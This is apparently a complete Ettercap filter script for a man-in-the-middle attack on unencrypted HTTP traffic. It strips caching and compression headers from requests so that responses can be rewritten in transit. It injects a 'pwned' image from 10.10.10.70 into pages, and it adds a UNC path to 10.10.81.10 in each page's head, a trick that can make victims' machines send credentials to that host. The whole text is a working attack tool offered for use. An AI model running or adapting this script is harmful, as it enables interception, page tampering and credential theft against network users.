if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "If-Modified-Since")) {
      replace("If-Modified-Since", "If-PACified-Since"); 
	  # note: replacement string is same length as original string
      msg("zapped modified!\n");
   }
}
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\" ");
   replace("IMG src=", "img src=\"http://10.10.10.70/pwned.jpg\" ");
   msg("pwned image injected\n");
}

if (ip.proto == TCP && tcp.src == 80) {
 replace("<head>", "<head> <img src=\"\\\\10.10.81.10\\pixel.gif\">");
  msg("Replaced head with head and image reference\n");
}
